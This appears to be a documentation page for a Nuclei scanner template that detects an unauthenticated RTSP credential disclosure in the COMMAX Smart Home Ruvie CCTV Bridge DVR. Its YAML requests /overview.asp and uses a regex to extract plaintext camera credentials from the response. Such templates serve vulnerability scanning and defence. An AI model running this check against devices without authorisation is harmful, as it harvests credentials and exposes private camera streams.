COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure
ID: commax-credentials-disclosure
Severity: critical
Author: gy741
Tags: commax,exposure,camera,iot
Description
Section titled “Description”The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text.
YAML Source
Section titled “YAML Source”id: commax-credentials-disclosure
info: name: COMMAX Smart Home Ruvie CCTV Bridge DVR - RTSP Credentials Disclosure author: gy741 severity: critical description: | The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose real time streaming protocol (RTSP) credentials in plain-text. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php metadata: max-request: 1 tags: commax,exposure,camera,iot
http: - method: GET path: - "{{BaseURL}}/overview.asp"
matchers: - type: word part: body words: - "DVR Lists" - "rtsp://" - "login_check.js" - "MAX USER :" condition: and
extractors: - type: regex part: body regex: - 'rtsp:\/\/([a-z:0-9A-Z@$.]+)\/Streaming\/Chann'# digest: 4a0a004730450221009bc64936bfd7f747cfa0e1a4e587120efe79dd0f8ba738501af288ae64e81f1002205d22252e40f960fde99c6e0ab8b0ab859835b5e1cf4156b1e3fe506a4f79ce02:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/commax-credentials-disclosure.yaml"